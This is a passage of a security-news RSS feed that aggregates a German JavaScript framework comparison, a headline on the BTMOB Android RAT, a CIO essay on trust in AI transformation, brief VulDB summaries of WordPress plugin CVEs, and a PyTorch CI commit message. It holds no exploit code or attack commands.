builder.io;</p></td></tr></tbody></table> </div></figure>



<p>Wenn Sie nun Wert auf ganz spezielle Funktionen legen, bringt Ihnen diese Tabelle natürlich wenig. Deswegen haben wir auch noch einen umfangreichen Feature-Vergleich der gelisteten JavaScript-Frontend-Frameworks für Sie erstellt. Diesen können Sie auch <a href="https://github.com/MTyson/iw-front-end-table/blob/main/JS%20Frameworks%20Feature%20Table.pdf" title="direkt über GitHub" target="_blank" rel="noopener">direkt über GitHub</a> als PDF-Datei herunterladen (inklusive klickbarer Links). </p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Die zehn wichtigsten JavaScript-Frameworks im Feature-Vergleich." title="Die zehn wichtigsten JavaScript-Frameworks im Feature-Vergleich." src="https://images.computerwoche.de/bdb/3392181/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Die zehn wichtigsten JavaScript-Frameworks im Feature-Vergleich.</p></figcaption></figure><p class="imageCredit">
					Foto: Matthew Tyson | IDG</p></div>




<h4 class="wp-block-heading"><strong>Playgrounds</strong></h4>



<p>Um sich einen schnellen ersten Eindruck von einem Framework zu verschaffen, empfiehlt sich, es in einem Online-REPL respektive Playground zu testen. Dazu ist kein Tooling-Setup erforderlich – ein Webbrowser reicht, um mit der Syntax experimentieren zu können. Sämtliche hier vorgestellten Frameworks können das bieten. React hostet zwar keine eigenen REPLs, diese Lücke wird jedoch von Drittanbietern geschlossen.</p>



<p><strong>Dieser Artikel ist <a href="https://www.infoworld.com/article/2336227/whats-the-best-javascript-framework.html" target="_blank">im Original</a> bei unserer Schwesterpublikation Infoworld.com erschienen.</strong></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[BTMOB Android RAT Spreads Through No-Code Builder Tooling]]></title>
<description><![CDATA[BTMOB Android RAT sold as a service with a no-code builder for fast, regional phishing lures]]></description>
<link>https://tsecurity.de/de/3548245/it-security-nachrichten/btmob-android-rat-spreads-through-no-code-builder-tooling/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3548245/it-security-nachrichten/btmob-android-rat-spreads-through-no-code-builder-tooling/</guid>
<pubDate>Tue, 26 May 2026 16:11:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[BTMOB Android RAT sold as a service with a no-code builder for fast, regional phishing lures]]></content:encoded>
</item>
<item>
<title><![CDATA[BTMOB Android RAT Spreads Through No-Code Builder Tooling]]></title>
<description><![CDATA[BTMOB Android RAT sold as a service with a no-code builder for fast, regional phishing lures This article has been indexed from www.infosecurity-magazine.com Read the original article: BTMOB Android RAT Spreads Through No-Code Builder Tooling
Read more →
The post BTMOB Android RAT Spreads Through...]]></description>
<link>https://tsecurity.de/de/3548239/it-security-nachrichten/btmob-android-rat-spreads-through-no-code-builder-tooling/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3548239/it-security-nachrichten/btmob-android-rat-spreads-through-no-code-builder-tooling/</guid>
<pubDate>Tue, 26 May 2026 16:11:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>BTMOB Android RAT sold as a service with a no-code builder for fast, regional phishing lures This article has been indexed from www.infosecurity-magazine.com Read the original article: BTMOB Android RAT Spreads Through No-Code Builder Tooling</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/btmob-android-rat-spreads-through-no-code-builder-tooling/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/btmob-android-rat-spreads-through-no-code-builder-tooling/">BTMOB Android RAT Spreads Through No-Code Builder Tooling</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why relationships are the hidden infrastructure of AI transformation]]></title>
<description><![CDATA[By now, most digital and tech leaders have heard some version of the same refrain, that AI adoption is 20% about the technology and 80% about the people. But even when leaders acknowledge the people side of AI, the conversation often moves quickly to skills, workforce planning, talent architectur...]]></description>
<link>https://tsecurity.de/de/3545294/it-security-nachrichten/why-relationships-are-the-hidden-infrastructure-of-ai-transformation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3545294/it-security-nachrichten/why-relationships-are-the-hidden-infrastructure-of-ai-transformation/</guid>
<pubDate>Mon, 25 May 2026 12:07:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>By now, most digital and tech leaders have heard some version of the same refrain, that AI adoption is 20% about the technology and 80% about the people. But even when leaders acknowledge the <a href="https://www.cio.com/article/4158552/scaling-ai-at-union-pacific-starts-with-people.html">people side of AI,</a> the conversation often moves quickly to skills, workforce planning, talent architecture, or reimagining how work gets done. Those are all important, but Breakthru Beverage Group EVP and CIO Glenn Remoreras believes it’s an incomplete picture.</p>



<p>He argues that the real differentiator in AI transformation is something more human: the ability to build trust, deepen relationships, and lead through connection when uncertainty is high. “As AI accelerates change and organizations transform at unprecedented speed, the real differentiator for leaders will no longer be how fast they move, but how deeply they connect,” he says.</p>



<p>For him, relationships aren’t soft skills or leadership accessories but the infrastructure that allows transformation to happen. When trust is strong, organizations align faster, challenge assumptions more productively, and move through uncertainty with greater confidence. When trust is weak, even the <a href="https://www.cio.com/article/4027422/the-missing-backbone-behind-your-stalled-ai-strategy.html">best technology strategy can stall</a>.</p>



<h2 class="wp-block-heading">Closing the IT and business chasm</h2>



<p>Remoreras’s views are rooted in a long-standing conviction about the role of technology in the enterprise. Over the years, he says he became almost maniacal about solving <a href="https://www.cio.com/article/4115023/how-tech-and-strategy-align-at-videojet.html">the persistent chasm between IT and the business</a>. In many organizations, business functions still view IT primarily as a service provider, and too often, tech leaders reinforce that mindset by referring to business stakeholders as customers. The language may seem harmless, but Remoreras believes it reflects a deeper problem.</p>



<p>In that model, the business sets strategy while IT receives it, translates it, and aligns execution. The relationship is reactive, and the trust gap remains unresolved. “To me, that paradigm is reactive,” he says, “and it exists largely because the trust gap has never been fully resolved.” The alternative is convergence, where business stakeholders aren’t customers but equal partners. CIOs don’t simply respond to strategy, they help shape it, bringing a clear understanding of how technology capabilities, data, platforms, and AI can change what’s possible.</p>



<p>“When trust exists, a different model emerges,” Remoreras says. “Technology strategy becomes inseparable from business strategy.” That shift matters even more in the age of AI because <a href="https://www.cio.com/article/4112436/how-oshkosh-corp-turns-ai-hype-into-measured-business-value.html">AI isn’t just another technology deployment</a>, it changes decision-making, work design, customer experience, risk, governance, and the way employees understand their own roles. If technology and business leaders approach AI from opposite sides of the table, adoption will be slower, riskier, and less likely to produce meaningful value.</p>



<h2 class="wp-block-heading">Trust as an operating system</h2>



<p>For Remoreras, trust isn’t a vague aspiration but a core operating infrastructure, and relationships are the primary enabler of that trust. That framing matters because AI introduces uncertainty at multiple levels. Employees may wonder how their work will change, leaders may struggle to separate hype from real opportunity, and functions may disagree about ownership, risk, <a href="https://www.cio.com/article/3985680/products-not-permission-slips-a-new-way-to-pay-for-digital-value.html">funding,</a> or pace. Without trust, those tensions can harden into resistance. But with trust, the same tensions can become productive.</p>



<p>Remoreras’s thinking has been shaped in part by the Business Relationship Management discipline. In 2014, he joined the BRM Institute as one of its early founding members and helped contribute to the development of its first body of knowledge. But he’s never viewed BRM as only a role, but rather a capability and leadership philosophy. “It shouldn’t be confined to a handful of dedicated roles,” he says. “It should be a competency shared by leaders across both technology and business functions.”</p>



<p>That distinction is critical. In many companies, relationship management is delegated to specific people or roles. Remoreras sees it as a leadership muscle that must be built across the enterprise, particularly as AI creates new dependencies across functions. The CIO, in this context, isn’t only a technology strategist or transformation leader but a trust builder, translator, challenger, and convener.</p>



<h2 class="wp-block-heading">The PATH to relationship leadership</h2>



<p>To make the idea more concrete, Remoreras developed a framework he calls PATH (Purpose, Agility, Trust, and Humanity), and introduced it in his <a href="https://brm.institute/the-future-belongs-to-relationship-leaders/">BRMConnect keynote</a> as a way to describe the leadership capabilities organizations will need in an AI-enabled world.</p>



<p>Purpose comes first because <a href="https://www.cio.com/article/4021841/lighting-the-first-flame-how-to-spark-a-transformation-that-sticks.html">transformation requires more than activity</a>. People need to understand why the work matters. “When people sense you’re driven by purpose, that what you’re doing truly matters, they lean in,” he says. Purpose creates alignment and gives people a shared reason to move through uncertainty together.</p>



<p>Agility is the ability to lead when the path is still forming. For Remoreras, leadership agility is about setting the rhythm, empowering others, and adjusting as the tempo shifts, not controlling every note. Trust is the currency of leadership in the age of AI, and the safety net that allows people to explore boldly, he says. Without it, experimentation slows, transparency fades, and people retreat into self-protection.</p>



<p>Humanity is the final pillar. When employees sense that leaders value technology more than people, they disengage. But when innovation is anchored in ethics, empathy, and fairness, people are more likely to follow with confidence. “Humanity ensures that progress benefits everyone, not just a few,” Remoreras says.</p>



<h2 class="wp-block-heading">Making AI adoption human</h2>



<p>The PATH framework reframes the <a href="https://www.cio.com/article/4106578/2026-the-year-of-scale-or-fail-in-enterprise-ai.html">AI adoption challenge</a> and moves the discussion beyond tools, training, and process redesign without diminishing the importance of any of them. Skills, governance, and use case prioritization all matter. But none will be enough if people don’t trust the leaders setting direction, the teams building solutions, or the organization’s intent for how AI will be used.</p>



<p>That’s why Remoreras’s message is particularly relevant for CIOs. Tech leaders are often accountable for the platforms and capabilities that make AI possible, but they’re also uniquely positioned to shape the relationships that make AI scalable. They can help the organization move from IT as service provider to technology as co-leader, build the connective tissue between strategy, execution, risk, and adoption, and create the conditions where business and tech leaders share ownership for outcomes. This is the leadership work AI requires, says Remoreras.</p>



<p>As machines become more capable, the leadership capabilities that can’t be automated become more valuable. The ability to listen, align, challenge, empathize, build trust, and lead through ambiguity becomes a strategic advantage. The future of AI won’t be determined only by which organizations choose the right platforms or move the fastest, but it’ll also be shaped by which organizations can create enough trust for people to move together.</p>



<p>That’s why relationships may be the hidden infrastructure of AI transformation. Not because they replace technology, but because they make transformation possible.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2018-25352 | ultimate-form-builder-lite Ultimate Form Builder Lite Plugin up to 1.3.7 on WordPress POST Parameter admin-ajax.php ufbl_get_entry_detail_action entry_id sql injection (Exploit 44884 / EUVD-2018-21872)]]></title>
<description><![CDATA[A vulnerability categorized as critical has been discovered in ultimate-form-builder-lite Ultimate Form Builder Lite Plugin up to 1.3.7 on WordPress. This impacts the function ufbl_get_entry_detail_action of the file admin-ajax.php of the component POST Parameter Handler. The manipulation of the ...]]></description>
<link>https://tsecurity.de/de/3543368/sicherheitsluecken/cve-2018-25352-ultimate-form-builder-lite-ultimate-form-builder-lite-plugin-up-to-137-on-wordpress-post-parameter-admin-ajaxphp-ufblgetentrydetailaction-entryid-sql-injection-exploit-44884-euvd-2018-21872/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3543368/sicherheitsluecken/cve-2018-25352-ultimate-form-builder-lite-ultimate-form-builder-lite-plugin-up-to-137-on-wordpress-post-parameter-admin-ajaxphp-ufblgetentrydetailaction-entryid-sql-injection-exploit-44884-euvd-2018-21872/</guid>
<pubDate>Sun, 24 May 2026 11:50:53 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">critical</a> has been discovered in <a href="https://vuldb.com/product/ultimate-form-builder-lite:ultimate_form_builder_lite_plugin">ultimate-form-builder-lite Ultimate Form Builder Lite Plugin up to 1.3.7</a> on WordPress. This impacts the function <code>ufbl_get_entry_detail_action</code> of the file <em>admin-ajax.php</em> of the component <em>POST Parameter Handler</em>. The manipulation of the argument <em>entry_id</em> results in sql injection.

This vulnerability is reported as <a href="https://vuldb.com/cve/CVE-2018-25352">CVE-2018-25352</a>. The attack can be launched remotely. Moreover, an exploit is present.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-6279 | themefusion Avada Builder Plugin up to 3.15.2 on WordPress AJAX Endpoint get_value injection (CNNVD-202605-4661)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, was found in themefusion Avada Builder Plugin up to 3.15.2 on WordPress. This affects the function Fusion_Builder_Conditional_Render_Helper::get_value of the component AJAX Endpoint. Such manipulation leads to injection.

This vulnerability is un...]]></description>
<link>https://tsecurity.de/de/3540637/sicherheitsluecken/cve-2026-6279-themefusion-avada-builder-plugin-up-to-3152-on-wordpress-ajax-endpoint-getvalue-injection-cnnvd-202605-4661/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3540637/sicherheitsluecken/cve-2026-6279-themefusion-avada-builder-plugin-up-to-3152-on-wordpress-ajax-endpoint-getvalue-injection-cnnvd-202605-4661/</guid>
<pubDate>Fri, 22 May 2026 21:39:47 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, was found in <a href="https://vuldb.com/product/themefusion:avada_builder_plugin">themefusion Avada Builder Plugin up to 3.15.2</a> on WordPress. This affects the function <code>Fusion_Builder_Conditional_Render_Helper::get_value</code> of the component <em>AJAX Endpoint</em>. Such manipulation leads to injection.

This vulnerability is uniquely identified as <a href="https://vuldb.com/cve/CVE-2026-6279">CVE-2026-6279</a>. The attack can be launched remotely. No exploit exists.

You should upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-1543 | themefusion Avada Builder Plugin up to 3.15.2 on WordPress Dynamic Data Feature cross site scripting (CNNVD-202605-4660)]]></title>
<description><![CDATA[A vulnerability was found in themefusion Avada Builder Plugin up to 3.15.2 on WordPress and classified as problematic. This issue affects some unknown processing of the component Dynamic Data Feature. Executing a manipulation can lead to cross site scripting.

The identification of this vulnerabi...]]></description>
<link>https://tsecurity.de/de/3540636/sicherheitsluecken/cve-2026-1543-themefusion-avada-builder-plugin-up-to-3152-on-wordpress-dynamic-data-feature-cross-site-scripting-cnnvd-202605-4660/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3540636/sicherheitsluecken/cve-2026-1543-themefusion-avada-builder-plugin-up-to-3152-on-wordpress-dynamic-data-feature-cross-site-scripting-cnnvd-202605-4660/</guid>
<pubDate>Fri, 22 May 2026 21:39:45 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/themefusion:avada_builder_plugin">themefusion Avada Builder Plugin up to 3.15.2</a> on WordPress and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. This issue affects some unknown processing of the component <em>Dynamic Data Feature</em>. Executing a manipulation can lead to cross site scripting.

The identification of this vulnerability is <a href="https://vuldb.com/cve/CVE-2026-1543">CVE-2026-1543</a>. The attack may be launched remotely. There is no exploit available.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[trunk/729ccceb819f20a344284ecf09cc8b063ea69a21: Migrate docker-builds workflow to OSDC with remote BuildKit (#184664)]]></title>
<description><![CDATA[Two related changes to docker-builds.yml:


Migrate the full .ci/docker/** image matrix to OSDC ARC runners.
The orchestrator runs on a small mt-l-x86iavx512-2-4 runner inside
ghcr.io/actions/actions-runner:latest; the actual build is
offloaded to the cluster's remote BuildKit pools. BuildKit is ...]]></description>
<link>https://tsecurity.de/de/3538872/downloads/trunk729ccceb819f20a344284ecf09cc8b063ea69a21-migrate-docker-builds-workflow-to-osdc-with-remote-buildkit-184664/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3538872/downloads/trunk729ccceb819f20a344284ecf09cc8b063ea69a21-migrate-docker-builds-workflow-to-osdc-with-remote-buildkit-184664/</guid>
<pubDate>Fri, 22 May 2026 10:46:22 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Two related changes to docker-builds.yml:</p>
<ol>
<li>
<p>Migrate the full <code>.ci/docker/**</code> image matrix to OSDC ARC runners.<br>
The orchestrator runs on a small <code>mt-l-x86iavx512-2-4</code> runner inside<br>
<code>ghcr.io/actions/actions-runner:latest</code>; the actual build is<br>
offloaded to the cluster's remote BuildKit pools. BuildKit is a<br>
remote builder, so a single x86 orchestrator can drive both amd64<br>
and arm64 builds -- only the <code>buildkit_addr</code> differs per matrix row.</p>
<p>Auth model:</p>
<ul>
<li>ECR: reuses <code>pytorch/pytorch/.github/actions/ecr-login@main</code>,<br>
which falls through to OIDC on OSDC pods (no EC2 instance profile,<br>
no IRSA on the <code>arc-runner</code> ServiceAccount). We pass<br>
<code>aws-role-to-assume: arn:aws:iam::308535385114:role/arc</code>; a<br>
companion change in pytorch-gha-infra grants that role the ECR<br>
write actions on the <code>pytorch/ci-image</code> repository.</li>
<li>GHCR: unchanged (GHCR_PAT under the <code>docker-build</code> environment,<br>
gated on push events).</li>
</ul>
<p>Dropped:</p>
<ul>
<li><code>pytorch/test-infra/.github/actions/calculate-docker-image</code> and<br>
<code>pull-docker-image</code>: the tag is just <code>git rev-parse HEAD:.ci/docker</code>,<br>
computed inline.</li>
<li><code>chown-workspace</code>, the legacy <code>ecr-login</code> composite step, and the<br>
<code>nick-fields/retry</code> wrapper for the GHCR push -- <code>docker buildx imagetools create</code> is a one-shot server-side cross-registry copy.</li>
</ul>
<p><code>.ci/docker/build.sh</code> learns one knob, <code>REMOTE_BUILDKIT</code>. When set,<br>
it swaps <code>--load -t &lt;tmp&gt;</code> for <code>--push</code> (remote builders cannot load<br>
into a non-existent local daemon) and skips the post-build<br>
<code>drun</code>-based sanity checks. The EC2 / local-daemon path is unchanged.</p>
<p><code>.github/actionlint.yaml</code> learns the new <code>mt-l-x86iavx512-2-4</code><br>
self-hosted runner label.</p>
</li>
<li>
<p>Add a <code>ciflow/docker</code> tag trigger, mirroring how trunk.yml uses<br>
<code>ciflow/trunk/*</code>. Pushing a <code>ciflow/docker/&lt;sha&gt;</code> tag to any commit<br>
force-builds the matrix on that commit -- useful for testing<br>
Dockerfile edits without an open PR, or for re-running a build that<br>
failed transiently. The existing <code>paths:</code> filter on <code>push:</code> is<br>
removed because GitHub AND-combines <code>tags</code> with <code>paths</code>, which would<br>
silently block ciflow pushes on commits that didn't already touch<br>
<code>.ci/docker</code>. PR-side path filtering is preserved.</p>
</li>
</ol>
<p>Authored by Claude.<br>
Pull Request resolved: <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4492202616" data-permission-text="Title is private" data-url="https://github.com/pytorch/pytorch/issues/184664" data-hovercard-type="pull_request" data-hovercard-url="/pytorch/pytorch/pull/184664/hovercard" href="https://github.com/pytorch/pytorch/pull/184664">#184664</a><br>
Approved by: <a href="https://github.com/jeanschmidt">https://github.com/jeanschmidt</a>, <a href="https://github.com/malfet">https://github.com/malfet</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[trunk/3df983ce80ed6a6d81579f3964e5d53787483bed: Migrate docker-builds workflow to OSDC with remote BuildKit (#184664)]]></title>
<description><![CDATA[Two related changes to docker-builds.yml:


Migrate the full .ci/docker/** image matrix to OSDC ARC runners.
The orchestrator runs on a small mt-l-x86iavx512-2-4 runner inside
ghcr.io/actions/actions-runner:latest; the actual build is
offloaded to the cluster's remote BuildKit pools. BuildKit is ...]]></description>
<link>https://tsecurity.de/de/3538177/downloads/trunk3df983ce80ed6a6d81579f3964e5d53787483bed-migrate-docker-builds-workflow-to-osdc-with-remote-buildkit-184664/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3538177/downloads/trunk3df983ce80ed6a6d81579f3964e5d53787483bed-migrate-docker-builds-workflow-to-osdc-with-remote-buildkit-184664/</guid>
<pubDate>Fri, 22 May 2026 04:02:36 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Two related changes to docker-builds.yml:</p>
<ol>
<li>
<p>Migrate the full <code>.ci/docker/**</code> image matrix to OSDC ARC runners.<br>
The orchestrator runs on a small <code>mt-l-x86iavx512-2-4</code> runner inside<br>
<code>ghcr.io/actions/actions-runner:latest</code>; the actual build is<br>
offloaded to the cluster's remote BuildKit pools. BuildKit is a<br>
remote builder, so a single x86 orchestrator can drive both amd64<br>
and arm64 builds -- only the <code>buildkit_addr</code> differs per matrix row.</p>
<p>Auth model:</p>
<ul>
<li>ECR: reuses <code>pytorch/pytorch/.github/actions/ecr-login@main</code>,<br>
which falls through to OIDC on OSDC pods (no EC2 instance profile,<br>
no IRSA on the <code>arc-runner</code> ServiceAccount). We pass<br>
<code>aws-role-to-assume: arn:aws:iam::308535385114:role/arc</code>; a<br>
companion change in pytorch-gha-infra grants that role the ECR<br>
write actions on the <code>pytorch/ci-image</code> repository.</li>
<li>GHCR: unchanged (GHCR_PAT under the <code>docker-build</code> environment,<br>
gated on push events).</li>
</ul>
<p>Dropped:</p>
<ul>
<li><code>pytorch/test-infra/.github/actions/calculate-docker-image</code> and<br>
<code>pull-docker-image</code>: the tag is just <code>git rev-parse HEAD:.ci/docker</code>,<br>
computed inline.</li>
<li><code>chown-workspace</code>, the legacy <code>ecr-login</code> composite step, and the<br>
<code>nick-fields/retry</code> wrapper for the GHCR push -- <code>docker buildx imagetools create</code> is a one-shot server-side cross-registry copy.</li>
</ul>
<p><code>.ci/docker/build.sh</code> learns one knob, <code>REMOTE_BUILDKIT</code>. When set,<br>
it swaps <code>--load -t &lt;tmp&gt;</code> for <code>--push</code> (remote builders cannot load<br>
into a non-existent local daemon) and skips the post-build<br>
<code>drun</code>-based sanity checks. The EC2 / local-daemon path is unchanged.</p>
<p><code>.github/actionlint.yaml</code> learns the new <code>mt-l-x86iavx512-2-4</code><br>
self-hosted runner label.</p>
</li>
<li>
<p>Add a <code>ciflow/docker</code> tag trigger, mirroring how trunk.yml uses<br>
<code>ciflow/trunk/*</code>. Pushing a <code>ciflow/docker/&lt;sha&gt;</code> tag to any commit<br>
force-builds the matrix on that commit -- useful for testing<br>
Dockerfile edits without an open PR, or for re-running a build that<br>
failed transiently. The existing <code>paths:</code> filter on <code>push:</code> is<br>
removed because GitHub AND-combines <code>tags</code> with <code>paths</code>, which would<br>
silently block ciflow pushes on commits that didn't already touch<br>
<code>.ci/docker</code>. PR-side path filtering is preserved.</p>
</li>
</ol>
<p>Authored by Claude.<br>
Pull Request resolved: <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4492202616" data-permission-text="Title is private" data-url="https://github.com/pytorch/pytorch/issues/184664" data-hovercard-type="pull_request" data-hovercard-url="/pytorch/pytorch/pull/184664/hovercard" href="https://github.com/pytorch/pytorch/pull/184664">#184664</a><br>
Approved by: <a href="https://github.com/jeanschmidt">https://github.com/jeanschmidt</a>, <a href="https://github.com/malfet">https://github.com/malfet</a></p>]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 0,30ms -->